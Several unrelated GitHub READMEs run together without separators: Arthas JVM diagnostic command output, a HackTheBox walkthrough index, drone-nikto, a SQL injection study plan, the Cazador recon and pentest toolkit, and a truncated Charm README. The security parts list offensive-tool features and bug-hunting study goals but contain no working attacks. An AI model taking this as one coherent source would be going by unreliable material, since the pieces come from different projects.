XmlWebApplicationContext modifier public annotation interfaces super-class +-org.springframework.web.context.support.AbstractRefreshableWebApplicationContext +-org.springframework.context.support.AbstractRefreshableConfigApplicationContext +-org.springframework.context.support.AbstractRefreshableApplicationContext +-org.springframework.context.support.AbstractApplicationContext +-org.springframework.core.io.DefaultResourceLoader +-java.lang.Object class-loader +-org.apache.catalina.loader.ParallelWebappClassLoader +-java.net.URLClassLoader@6108b2d7 +-sun.misc.Launcher$AppClassLoader@18b4aac2 +-sun.misc.Launcher$ExtClassLoader@1ddf84b8 classLoaderHash 25131501 ``` #### stack View the call stack of `test.arthas.TestStack#doGet`: ``` $ stack test.arthas.TestStack doGet Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 286 ms. ts=2018-09-18 10:11:45;thread_name=http-bio-8080-exec-10;id=d9;is_daemon=true;priority=5;TCCL=org.apache.catalina.loader.ParallelWebappClassLoader@25131501 @test.arthas.TestStack.doGet() at javax.servlet.http.HttpServlet.service(HttpServlet.java:624) at javax.servlet.http.HttpServlet.service(HttpServlet.java:731) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110) ... at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:451) at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1121) at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637) at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) at java.lang.Thread.run(Thread.java:745) ``` #### Trace See what is slowing down your method invocation with trace command: ![trace](site/src/site/sphinx/_static/trace.png) #### Watch Watch the first parameter and thrown exception of `test.arthas.TestWatch#doGet` only if it throws exception. ``` $ watch test.arthas.TestWatch doGet {params[0], throwExp} -e Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 65 ms. ts=2018-09-18 10:26:28;result=@ArrayList[ @RequestFacade[org.apache.catalina.connector.RequestFacade@79f922b2], @NullPointerException[java.lang.NullPointerException], ] ``` #### Monitor Monitor a specific method invoction statistics, including total number of invocations, avarage response time, success rate, every 5 seconds: ``` $ monitor -c 5 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 109 ms. timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:32 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 0.67 0.00% timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:37 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 1.00 0.00% timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:42 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 0.43 0.00% ``` #### Time Tunnel(tt) Record method invocation data, so that you can check the method invacation parameters, returned value and thrown exception later. It works as if you could come back and replay the past method invocation via time tunnel. ``` $ tt -t org.apache.dubbo.demo.provider.DemoServiceImpl sayHello Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 75 ms. INDEX TIMESTAMP COST(ms) IS-RET IS-EXP OBJECT CLASS METHOD ------------------------------------------------------------------------------------------------------------------------------------- 1000 2018-09-20 09:54:10 1.971195 true false 0x55965cca DemoServiceImpl sayHello 1001 2018-09-20 09:54:11 0.215685 true false 0x55965cca DemoServiceImpl sayHello 1002 2018-09-20 09:54:12 0.236303 true false 0x55965cca DemoServiceImpl sayHello 1003 2018-09-20 09:54:13 0.159598 true false 0x55965cca DemoServiceImpl sayHello 1004 2018-09-20 09:54:14 0.201982 true false 0x55965cca DemoServiceImpl sayHello 1005 2018-09-20 09:54:15 0.214205 true false 0x55965cca DemoServiceImpl sayHello 1006 2018-09-20 09:54:16 0.241863 true false 0x55965cca DemoServiceImpl sayHello 1007 2018-09-20 09:54:17 0.305747 true false 0x55965cca DemoServiceImpl sayHello 1008 2018-09-20 09:54:18 0.18468 true false 0x55965cca DemoServiceImpl sayHello ``` #### Classloader ``` $ classloader name numberOfInstances loadedCountTotal BootstrapClassLoader 1 3346 com.taobao.arthas.agent.ArthasClassloader 1 1262 java.net.URLClassLoader 2 1033 org.apache.catalina.loader.ParallelWebappClassLoader 1 628 sun.reflect.DelegatingClassLoader 166 166 sun.misc.Launcher$AppClassLoader 1 31 com.alibaba.fastjson.util.ASMClassLoader 6 15 sun.misc.Launcher$ExtClassLoader 1 7 org.jvnet.hk2.internal.DelegatingClassLoader 2 2 sun.reflect.misc.MethodUtil 1 1 ``` #### Web Console * https://alibaba.github.io/arthas/web-console ![web console](site/src/site/sphinx/_static/web-console-local.png) ### Credit * [greys-anatomy](https://github.com/oldmanpushcart/greys-anatomy): The Arthas code base has derived from Greys, we thank for the excellent work done by Greys. * [termd](https://github.com/termd/termd): Arthas's terminal implementation is based on termd, an open source library for writing terminal applications in Java. * [crash](https://github.com/crashub/crash): Arthas's text based user interface rendering is based on codes extracted from [here](https://github.com/crashub/crash/tree/1.3.2/shell) * [cli](https://github.com/eclipse-vertx/vert.x/tree/master/src/main/java/io/vertx/core/cli): Arthas's command line interface implementation is based on cli, open sourced by vert.x
# HackTheBox CTF Cheatsheet This cheatsheet is aimed at the CTF Players and Beginners to help them sort Hack The Box Labs on the basis of Operating System and Difficulty. This list contains all the Hack The Box writeups available on hackingarticles. We have performed and compiled this list on our experience. Please share this with your connections and direct queries and feedback to [Pavandeep Singh](https://twitter.com/pavan2318). [1.1]: http://i.imgur.com/tXSoThF.png [1]: http://www.twitter.com/hackinarticles # Follow us on [![alt text][1.1]][1] | No. | Machine Name | Operating System | Difficulty | |-----|--------------|------------------|------------------| | 1. | [Access](https://www.hackingarticles.in/hack-the-box-access-walkthrough/)|Windows|Easy| | 2. | [Active](https://www.hackingarticles.in/hack-the-box-active-walkthrough/)|Windows|Easy| | 3. | [Apocalyst](https://www.hackingarticles.in/hack-the-box-challenge-apocalyst-walkthrough/)|Linux|Medium| | 4. | [Aragog](https://www.hackingarticles.in/hack-the-box-aragog-walkthrough/)|Linux|Medium| | 5. | [Arctic](https://www.hackingarticles.in/hack-the-box-challenge-arctic-walkthrough/)|Windows|Easy| | 6. | [Ariekei](https://www.hackingarticles.in/hack-the-box-challenge-ariekei-walkthrough/)|Linux|Insane| | 7. | [Bank](https://www.hackingarticles.in/hack-the-box-challenge-bank-walkthrough/)|Linux|Easy| | 8. | [Bart](https://www.hackingarticles.in/hack-the-box-bart-walkthrough/)|Windows|Medium| | 9. | [Bashed](https://www.hackingarticles.in/hack-the-box-challenge-bashed-walkthrough/)|Linux|Easy| | 10. | [Beep](https://www.hackingarticles.in/hack-the-box-challenge-beep-walkthrough/)|Linux|Easy| | 11. | [Blocky](https://www.hackingarticles.in/hack-the-box-challenge-blocky-walkthrough/)|Linux|Easy| | 12. | [Blue](https://www.hackingarticles.in/hack-the-box-challenge-blue-walkthrough/)|Windows|Easy| | 13. | [Bounty](https://www.hackingarticles.in/hack-the-box-bounty-walkthrough/)|Windows|Easy| | 14. | [Brainfuck](https://www.hackingarticles.in/hack-the-box-challenge-brainfuck-walkthrough/)|Linux|Insane| | 15. | [Calamity](https://www.hackingarticles.in/hack-the-box-challenge-calamity-walkthrough/)|Linux|Hard| | 16. | [Canape](https://www.hackingarticles.in/hack-the-box-challenge-canape-walkthrough/)|Linux|Medium| | 17. | [Carrier](https://www.hackingarticles.in/hack-the-box-carrier-walkthrough/)|Linux|Medium| | 18. | [Celestial](https://www.hackingarticles.in/hack-the-box-celestial-walkthrough/)|Linux|Medium| | 19. | [Charon](https://www.hackingarticles.in/hack-the-box-challenge-charon-walkthrough/)|Linux|Hard| | 20. | [Chatterbox](https://www.hackingarticles.in/hack-the-box-challenge-chatterbox-walkthrough/)|Windows|Medium| | 21. | [Crimestoppers](https://www.hackingarticles.in/hack-the-box-challenge-crimestoppers-walkthrough/)|Windows|Hard| | 22. | [Cronos](https://www.hackingarticles.in/hack-the-box-challenge-cronos-walkthrough/)|Linux|Hard| | 23. | [Curling](https://www.hackingarticles.in/hack-the-box-curling-walkthrough/)|Linux|Easy| | 24. | [Dab](https://www.hackingarticles.in/hack-the-box-dab-walkthrough/)|Linux|Hard| | 25. | [Devel](https://www.hackingarticles.in/hack-the-box-challenge-devel-walkthrough/)|Windows|Easy| | 26. | [DevOops](https://www.hackingarticles.in/hack-the-box-devoops-walkthrough/)|Linux|Medium| | 27. | [Dropzone](https://www.hackingarticles.in/hack-the-box-dropzone-walkthrough/)|Windows|Hard| | 28. | [Enterprise](https://www.hackingarticles.in/hack-the-box-challenge-enterprises-walkthrough/)|Linux|Medium| | 29. | [Europa](https://www.hackingarticles.in/hack-the-box-challenge-europa-walkthrough/)|Linux|Medium| | 30. | [Falafel](https://www.hackingarticles.in/hack-the-box-challenge-falafel-walkthrough/)|Linux|Hard| | 31. | [Fighter](https://www.hackingarticles.in/hack-the-box-fighter-walkthrough/)|Windows|Insane| | 32. | [Fluxcapacitor](https://www.hackingarticles.in/hack-the-box-challenge-fluxcapacitor-walkthrough/)|Linux|Medium| | 33. | [FriendZone](https://www.hackingarticles.in/hack-the-box-friendzone-walkthrough/)|Linux|Easy| | 34. | [Frolic](https://www.hackingarticles.in/hack-the-box-frolic-walkthrough/)|Linux|Easy| | 35. | [Fulcurm](https://www.hackingarticles.in/hack-the-box-fulcrum-walkthrough/)|Linux|Easy| | 36. | [Giddy](https://www.hackingarticles.in/hack-the-box-giddy-walkthrough/)|Windows|Medium| | 37. | [Grandpa](https://www.hackingarticles.in/hack-the-box-challenge-grandpa-walkthrough/)|Windows|Easy| | 38. | [Granny](https://www.hackingarticles.in/hack-the-box-challenge-granny-walkthrough/)|Windows|Easy| | 39. | [Haircut](https://www.hackingarticles.in/hack-the-box-challenge-haircut-walkthrough/)|Linux|Medium| | 40. | [Hawk](https://www.hackingarticles.in/hack-the-box-hawk-walkthrough/)|Linux|Medium| | 41. | [Help](https://www.hackingarticles.in/hack-the-box-help-walkthrough/)|Linux|Easy| | 42. | [Holiday](https://www.hackingarticles.in/hack-the-box-holiday-walkthrough/)|Linux|Hard| | 43. | [Inception](https://www.hackingarticles.in/hack-the-box-challenge-inception-walkthrough/)|Linux|Medium| | 44. | [Irked](https://www.hackingarticles.in/hack-the-box-irked-walkthrough/)|Linux|Easy| | 45. | [Jail](https://www.hackingarticles.in/hack-the-box-challenge-jail-walkthrough/)|Linux|Insane| | 46. | [Jeeves](https://www.hackingarticles.in/hack-the-box-challenge-jeeves-walkthrough/)|Windows|Medium| | 47. | [Jerry](https://www.hackingarticles.in/hack-the-box-jerry-walkthrough/)|Windows|Easy| | 48. | [Joker](https://www.hackingarticles.in/hack-the-box-challenge-joker-walkthrough/)|Linux|Hard| | 49. | [Kotarak](https://www.hackingarticles.in/hack-the-box-challenge-kotarak-walkthrough/)|Linux|Hard| | 50. | [Lame](https://www.hackingarticles.in/hack-the-box-challenge-lame-walkthrough/)|Linux|Easy| | 51. | [Lazy](https://www.hackingarticles.in/hack-the-box-challenge-lazy-walkthrough/)|Linux|Medium| | 52. | [Legacy](https://www.hackingarticles.in/hack-the-box-challenge-legacy-walkthrough/)|Windows|Easy| | 53. | [Lightweight](https://www.hackingarticles.in/lightweight-hack-the-box-walkthrough/)|Linux|Medium| | 54. | [Mantis](https://www.hackingarticles.in/hack-the-box-challenge-mantis-walkthrough/)|Windows|Hard| | 55. | [Minion](https://www.hackingarticles.in/hack-the-box-minion-walkthrough/)|Windows|Insane| | 56. | [Mirai](https://www.hackingarticles.in/hack-the-box-challenge-mirai-walkthrough/)|Linux|Easy| | 57. | [Mischief](https://www.hackingarticles.in/hack-the-box-mischief-walkthrough/)|Linux|Insane| | 58. | [Netmon](https://www.hackingarticles.in/hack-the-box-netmon-walkthrough/)|Windows|Easy| | 59. | [Nibble](https://www.hackingarticles.in/hack-the-box-challenge-nibble-walkthrough/)|Linux|Easy| | 60. | [Nightmare](https://www.hackingarticles.in/hack-nightmare-vm-ctf-challenge/)|Linux|Insane| | 61. | [Nineveh](https://www.hackingarticles.in/hack-the-box-nineveh-walkthrough/)|Linux|Medium| | 62. | [Node](https://www.hackingarticles.in/hack-the-box-challenge-node-walkthrough/)|Linux|Medium| | 63. | [October](https://www.hackingarticles.in/hack-the-box-october-walkthrough/)|Linux|Medium| | 64. | [Olympus](https://www.hackingarticles.in/hack-the-box-olympus-walkthrough/)|Linux|Medium| | 65. | [Optimum](https://www.hackingarticles.in/hack-the-box-challenge-optimum-walkthrough/)|Windows|Easy| | 66. | [Poison](https://www.hackingarticles.in/hack-the-box-poison-walkthrough/)|FreeBSD|Medium| | 67. | [Popcorn](https://www.hackingarticles.in/hack-the-box-challenge-popcorn-walkthrough/)|Linux|Medium| | 68. | [SecNotes](https://www.hackingarticles.in/hack-the-box-secnotes-walkthrough/)|Windows|Medium| | 69. | [Sense](https://www.hackingarticles.in/hack-the-box-challenge-sense-walkthrough/)|FreeBSD|Easy| | 70. | [Shocker](https://www.hackingarticles.in/hack-the-box-challenge-shocker-walkthrough/)|Linux|Easy| | 71. | [Shrek](https://www.hackingarticles.in/hack-the-box-challenge-shrek-walkthrough/)|Linux|Hard| | 72. | [Silo](https://www.hackingarticles.in/hack-the-box-silo-walkthrough/)|Windows|Medium| | 73. | [Sneaky](https://www.hackingarticles.in/hack-the-box-challenge-sneaky-walkthrough/)|Linux|Medium| | 74. | [Solid State](https://www.hackingarticles.in/hack-the-box-challenge-solid-state-walkthrough/)|Linux|Medium| | 75. | [Stratosphere](https://www.hackingarticles.in/hack-the-box-stratospherewalkthrough/)|Linux|Medium| | 76. | [Sunday](https://www.hackingarticles.in/hack-the-box-sunday-walkthrough/)|Solaris|Easy| | 77. | [Tally](https://www.hackingarticles.in/hack-the-box-challenge-tally-walkthrough/)|Windows|Hard| | 78. | [TartarSauce](https://www.hackingarticles.in/hack-the-box-tartarsauce-walkthrough/)|Linux|Medium| | 79. | [Teacher](https://www.hackingarticles.in/hack-the-box-teacher-walkthrough/)|Linux|Easy| | 80. | [Tenten](https://www.hackingarticles.in/hack-the-box-challenge-tenten-walkthrough/)|Linux|Medium| | 81. | [Valentine](https://www.hackingarticles.in/hack-the-box-valentine-walkthrough/)|Linux|Easy| | 82. | [Vault](https://www.hackingarticles.in/hack-the-box-vault-walkthrough/)|Linux|Medium| | 83. | [Waldo](https://www.hackingarticles.in/hack-the-box-waldo-walkthrough/)|Linux|Medium| | 84. | [Ypuffy](https://www.hackingarticles.in/hack-the-box-ypuffy-walkthrough/)|Others|Medium| | 85. | [Zipper](https://www.hackingarticles.in/hack-the-box-zipper-walkthrough/)|Linux|Hard| | 86. | [Luke](https://www.hackingarticles.in/hack-the-box-luke-walkthrough/)|Linux|Easy| | 87. | [Bastion](https://www.hackingarticles.in/hack-the-box-challenge-bastion-walkthrough/)|Windows|Easy| | 88. | [Heist](https://www.hackingarticles.in/hack-the-box-heist-walkthrough/) | Windows | Medium | | 89. | [Bitlab](https://www.hackingarticles.in/hack-the-box-challenge-bitlab-walkthrough/) | Linux | Medium | | 90. | [Jarvis](https://www.hackingarticles.in/hack-the-box-jarvis-walkthrough/) | Linux | Medium | | 91. | [Writeup](https://www.hackingarticles.in/hack-the-box-writeup-walkthrough/) | Linux | Easy | | 92. | [Networked](https://www.hackingarticles.in/hack-the-box-networked-walkthrough/) | Linux | Medium | | 93. | [Haystack](https://www.hackingarticles.in/hack-the-box-haystack-walkthrough/) | Linux | Medium | | 94. | [Postman](https://www.hackingarticles.in/hack-the-box-postman-walkthrough/) | Linux | Easy | | 95. | [Wall](https://www.hackingarticles.in/hack-the-box-wall-walkthrough/)| Linux | Medium | | 96. | [Open Admin Box](https://www.hackingarticles.in/hack-the-box-open-admin-box-walkthrough/)| Linux | Easy | | 97. | [Monteverde](https://www.hackingarticles.in/hack-the-box-monteverde-walkthrough/)| Windows | Medium | | 98. | [Sauna](https://www.hackingarticles.in/hackthebox-sauna-walkthrough/)| Windows | Easy | | 99. | [Conceal](https://www.hackingarticles.in/conceal-hackthebox-walkthrough/)| Windows | Hard | | 100. | [Tabby](https://www.hackingarticles.in/tabby-hackthebox-walkthrough/)| Linux | Easy | | 101. | [Omni](https://www.hackingarticles.in/omni-hackthebox-walkthrough/)| Windows | Easy | | 102. | [Mango](https://www.hackingarticles.in/mango-hackthebox-walkthrough/)| Linux | Medium | | 103. | [Servmon](https://www.hackingarticles.in/servmon-hackthebox-walkthrough/)| Windows | Easy | | 104. | [Bastard](https://www.hackingarticles.in/bastard-hackthebox-walkthrough/)| Windows | Medium | | 105. | [Cascade](https://www.hackingarticles.in/cascade-hackthebox-walkthrough/)| Windows | Medium | | 106. | [Traverxec](https://www.hackingarticles.in/traverxec-hackthebox-walkthrough/)| Linux | Easy | | 107. | [Forest](https://www.hackingarticles.in/forest-hackthebox-walkthrough/)| Windows | Easy | | 108. | [Admirer](https://www.hackingarticles.in/admirer-hackthebox-walkthrough/)| Linux | Easy | | 109. | [Blunder](https://www.hackingarticles.in/blunder-hackthebox-walkthrough/)| Linux | Easy | | 110. | [SwagShop](https://www.hackingarticles.in/swagshop-hackthebox-walkthrough/)| Linux | Easy | | 111. | [Doctor](https://www.hackingarticles.in/doctor-hackthebox-walkthrough/)| Linux | Easy | | 112. | [Fuse](https://www.hackingarticles.in/fuse-hackthebox-walkthrough/)| Windows | Medium | | 113. | [LaCasaDePapel](https://www.hackingarticles.in/lacasadepapel-hackthebox-walkthrough/)| Linux | Easy | | 114. | [Magic](https://www.hackingarticles.in/magic-hackthebox-walkthrough/)| Linux | Medium | | 115. | [Traceback](https://www.hackingarticles.in/traceback-hackthebox-walkthrough/)| Linux | Easy | | 116. | [Remote](https://www.hackingarticles.in/remote-hackthebox-walkthrough/)| Windows | Easy | | 117. | [Book](https://www.hackingarticles.in/book-hackthebox-walkthrough/)| Linux | Medium | | 118. | [Cache](https://www.hackingarticles.in/cache-hackthebox-walkthrough/)| Linux | Medium | | 119. | [OpenKeyS](https://www.hackingarticles.in/openkeys-hackthebox-walkthrough/)| OpenBSD | Medium | | 120. | [Chaos](https://www.hackingarticles.in/chaos-hackthebox-walkthrough/)| Linux | Medium | | 121. | [Querier](https://www.hackingarticles.in/querier-hackthebox-walkthrough/)| Windows | Medium | | 122. | [Sniper](https://www.hackingarticles.in/sniper-hackthebox-walkthrough/)| Windows | Medium | | 123. | [Resolute](https://www.hackingarticles.in/resolute-hackthebox-walkthrough/)| Windows | Medium |
# drone-nikto Imports XML from [Nikto](https://github.com/sullo/nikto) into a lair project. ## Note The latest version of Nikto v2.1.6 contains some flaws within the XML output format that will need to be addressed before successful execution of drone-nikto. There is currently a Nikto pull request to address this issue [here](https://github.com/sullo/nikto/pull/296). Please follow these instructions to modify existing Nikto XML files. * Above the first `<niktoscan>` XML tag append `<niktoscan>` * Append `</niktoscan>` tag to each instance of `</scandetails>` tag The Nikto XML template can be updated by performing the following modifications: * <Nikto Install Dir>/templates/xml_start.tmpl append `<niktoscan>` to the end of the file. * <Nikto Install Dir>/templates/xml_end.tmpl append `</niktoscan>` to the end of the file. To update Kali Linux, the xml_start.tmpl and xml_end.tmpl can be located in /usr/share/nikto/templates. ## Install Download a compiled binary for supported operating systems from [here](https://github.com/lair-framework/drone-nikto/releases/latest). ``` $ mv drone-nikto* drone-nikto $ ./drone-nikto -h ``` ## Build from source ``` $ go get github.com/lair-framework/drone-nikto ```
# 50-Days-Of-SQLi Q. Why I am starting this? I have always struggled as a bug hunter. Whenever I read anything new I learn from it but hardly implement it. And because of that whenever I read anything now, it feels like I know it and so couldn't digest complete information that the writeup has to offer. And so the adrenaline rush isn't present there when I consume any information. Because of which I am not able to finding quality bugs. And when you cannot find quality bugs, you can feel the pain. It feels like task done but no satisfaction like you are reporting just for the sake of it. So from now onwards will improve my knowledge first and then will hunt harder to get those quality bugs. So, have thought to first hunt on single bug as the saying goes : Its better to be master of one, than to be jack of all. I will post everything i will read, or refer to and also will try to share my findings (if permitted) with you all. Also will post to-dos and short notes. The resources may not be in sequential order like easy to hard. # My plans For Learning (2hrs every single day): - [ ] Complete SQL injection section from WAHH-v2, Real World Bug Hunting, Bug Bounty Bootcamp - [ ] Complete all labs from Portswigger SQLi labs - [ ] Complete all SQLi labs from TryHackMe - [ ] Complete/Read writeups of HackTheBox, Root-me labs - [ ] Read the book : SQL Injection Attack and Defense - [ ] Read writeups/vlogs related to SQL injection - [ ] Do other labs (from Github) - [ ] Learn various relevant tools for SQLi (SQLMap, NoSQLMap, Burp Extensions etc) to automate and implement into workflow/methodology # My plans For hunting (2hrs atleast daily from the day I feel like): - [ ] Will select certain programs - [ ] Hunt each and every parameter of those # Lets see how it goes, if I am able to find any bugs or not! :)
![alt tag](https://github.com/YasserGersy/cazador_unr/blob/master/imgs/cazador.png?raw=true) [![Gitter](https://badges.gitter.im/cazadorapp/community.svg)](https://gitter.im/cazadorapp/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge) [![GitHub issues](https://img.shields.io/github/issues/YasserGersy/cazador_unr.svg)](https://github.com/YasserGersy/cazador_unr/issues) [![Github Stars](https://img.shields.io/github/stars/YasserGersy/cazador_unr.svg?style=social&label=Stars)](https://github.com/YasserGersy/cazador_unr/) [![GitHub Followers](https://img.shields.io/github/followers/YasserGersy.svg?style=social&label=Follow)](https://github.com/YasserGersy/cazador_unr/) [![Tweet](https://img.shields.io/twitter/url/http/YasserGersy.svg?style=social)](https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Ftweet-button%2Foverview&ref_src=twsrc%5Etfw&text=Cazador%20-%20Automated%20Pentest%20Recon%20Scanner&tw_p=tweetbutton&url=https%3A%2F%2Fgithub.com%2FYasserGersy%2Fcazador_unr) [![Follow on Twitter](https://img.shields.io/twitter/follow/YasserGersy.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=YasserGersy) # Tools *Listeners* - HTTP Server - DNS Server - TCP Server - POSTMessage Hooker - Websocket Hooker *Analyzers* - HTTP - JS-Files - FileSystem - Binary - Packet *Net Tools* - Get DNS Records - Resolve Hosts - Reverse IPs - Passive DNS - DNS History *Text Tools* - Text Processing - Block construct - Format generator - pattern creation - Encrypt/Decrypt data - Hash Identification - Crackers - Payload Generators - Encoders/Decoders - Poc Generators (Python , bash , HTML) *Recon* - Get Websites ScreenShots - GET Subdomains (Scrabbing , Mining , DNS-brute-force,Http-brute-force) - Site categorizer - s3/GC bucket enumeration - Github Lister - Ip History *Scanners* - Detect Misconfiguration - Port/vulnerability/ssl scanner - Vulnerability Exploiters - Waf Detection *Scrabbers* - Download Android apps (APK) - Travis-CI logs fetching *Tools discussed separately* [here](https://github.com/YasserGersy/cazador_unr/tree/master/doc) <a href="/imgs" >ScreenShots </a> <!-- [Dig] <img src="https://github.com/YasserGersy/cazador_unr/raw/master/imgs/Dig0.png"/> --> [scanner]<img src="https://github.com/YasserGersy/cazador_unr/blob/master/imgs/scanner0.png" /> [TcpListener]<img src="https://github.com/YasserGersy/cazador_unr/blob/master/imgs/tcplistener3.png"/> [FileMiner]<img src="https://github.com/YasserGersy/cazador_unr/raw/master/imgs/FIleMiner.png"/> [Subscrabber]<img src="https://raw.githubusercontent.com/YasserGersy/cazador_unr/master/imgs/Subscrabber.png" /> [Hpinger]<img src="https://github.com/YasserGersy/cazador_unr/blob/master/imgs/pinger0.png?raw=true" /> <a href="https://www.virustotal.com/gui/file/0a59af8b6c192e4a8c02eea5d11737defce08adae1fdf4abd5cc50a4554d7a3d/detection" >virustotal Scan result</a> **if the app is not working properly , Download the missing dlls, put them in application folder , beside the executable file** **Some notes:** - This tool is meant primarily for bug hunters (specially beginners). - This tool is not backdoored with any malicious software/tracking . - Memory is not carefully managed so be carefull , do not use all the tools at the same time , Consider to make targets and threads less than 1000. - Do not use it illegally - Some Tools are disabled by default , you could enable any by setting debug mode to true - Many third-parties are used without permission no APIS used. - The source code is not published because the tool is a beta and the code is uggly and worse than my handwriting. - Project is planned to be open-source with the first release. - Suggestions are deeply welcome. - Credits are reserved for all authors and third-parties. - Feel free to push any issue **Linked IN** - https://blog.intigriti.com/2019/07/02/bugbytes-25-to-scan-or-not-to-scan-gotcha-and-live-mentoring-by-zseano/ - https://pentester.land/newsletter/2019/07/02/the-5-hacking-newsletter-60.html - https://securitytraning.com/bugbounty-with-cazador/ Happy Automating
Charm ===== <p> <img src="https://stuff.charm.sh/charm/charm-header.png?14" width="220" alt="A little cloud with a pleased expression followed by the words ‘Charm from Charm’"><br> <a href="https://github.com/charmbracelet/charm/releases"><img src="https://img.shields.io/github/release/charmbracelet/charm.svg" alt="Latest Release"></a> <a href="https://pkg.go.dev/github.com/charmbracelet/charm?tab=doc"><img src="https://godoc.org/github.com/golang/gddo?status.svg" alt="GoDoc"></a> <a href="https://github.com/charmbracelet/charm/actions"><img src="https://github.com/charmbracelet/charm/workflows/build/badge.svg" alt="Build Status"></a> <a href="https://nightly.link/charmbracelet/charm/workflows/nightly/main"><img src="https://shields.io/badge/-Nightly%20Builds-orange?logo=hackthebox&logoColor=fff&style=appveyor"/></a> </p> Charm is a set of tools that makes adding a backend to your terminal-based applications fun and easy. Quickly build modern CLI applications without worrying about user accounts, data storage and encryption. Charm powers terminal apps like [Glow][glow] and [Skate][skate]. ## Features * [**Charm KV:**](#charm-kv) an embeddable, encrypted, cloud-synced key-value store built on [BadgerDB][badger] * [**Charm FS:**](#charm-fs) a Go `fs.FS` compatible cloud-based user filesystem * [**Charm Crypt:**](#charm-crypt) end-to-end encryption for stored data and on-demand encryption for arbitrary data * [**Charm Accounts:**](#charm-accounts) invisible user account creation and authentication There’s also the powerful [Charm Client](#charm-client) for directly accessing Charm services. [Self-hosting](#self-hosting) a Charm Cloud is as simple as running `charm serve`. ## Installation Use a package manager: ```bash # macOS or Linux brew install charmbracelet/tap/charm # Arch Linux (btw) pacman -S charm # Nix nix-env -iA nixpkgs.charm # Debian/Ubuntu sudo mkdir -p /etc/apt/keyrings curl -fsSL https://repo.charm.sh/apt/gpg.key | sudo gpg --dearmor -o /etc/apt/keyrings/charm.gpg echo "deb [signed-by=/etc/apt/keyrings/charm.gpg] https://repo.charm.sh/apt/ * *" | sudo tee /etc/apt/sources.list.d/charm.list sudo apt update && sudo apt install charm # Fedora/RHEL echo '[charm] name=Charm baseurl=https://repo.charm.sh/yum/ enabled=1 gpgcheck=1 gpgkey=https://repo.charm.sh/yum/gpg.key' | sudo tee /etc/yum.repos.d/charm.repo sudo yum install charm ``` Or download a package or binary from the [releases][releases] page. All major platforms and architectures are supported, including FreeBSD and ARM. You can also just build and install it yourself: ```bash git clone https://github.com/charmbracelet/charm.git cd charm go install ``` ## Charm KV A powerful, embeddable key-value store built on [BadgerDB][badger]. Store user data, configuration, create a cache or even store large files as values. When you use Charm KV your users automatically get cloud backup, multi-machine syncing, end-to-end encryption, and the option to self-host. ```go import "github.com/charmbracelet/charm/kv" // Open a database (or create one if it doesn’t exist) db, err := kv.OpenWithDefaults("my-cute-db") if err != nil { log.Fatal(err) } defer db.Close() // Fetch updates and easily define your own syncing strategy if err := db.Sync(); err != nil { log.Fatal(err) } // Save some data if err := db.Set([]byte("fave-food"), []byte("gherkin")); err != nil { log.Fatal(err) } // All data is binary if err := db.Set([]byte("profile-pic"), someJPEG); err != nil { log.Fatal(err) } ``` Charm KV can also enhance existing [BadgerDB][badger] implementations. It works with standard Badger transactions and provides top level functions that mirror those in Badger. For details on Charm KV, see [the Charm KV docs][kv]. ## Charm FS Each Charm user has a virtual personal filesystem on the Charm server. Charm FS provides a Go [fs.FS](https://golang.org/pkg/io/fs/) implementation for the user along with additional write and delete methods. If you're building a tool that requires file storage, Charm FS will provide it on a networked-basis without friction-filled authentication flows. ```go import charmfs "github.com/charmbracelet/charm/fs" // Open the user’s filesystem cfs, err := charmfs.NewFS() if err != nil { log.Fatal(err) } // Save a file data := bytes.NewBuffer([]byte("some data")) if err := cfs.WriteFile("./path/to/file", data, fs.FileMode(0644), int64(data.Len())); err != nil { log.Fatal(err) } // Get a file f, err := cfs.Open("./path/to/file") if err != nil { log.Fatal(err) } defer f.Close() // Just read whole file in one shot data, err := cfs.ReadFile("./path/to/file") if err != nil { log.Fatal(err) } ``` ### FAQ <details> <summary>Are there any file size limits?</summary> <p>There are no limitations in file size per se, although there's a 1 GB cap on storage for the free Charm accounts, but you can get unlimited if you self-host the Charm 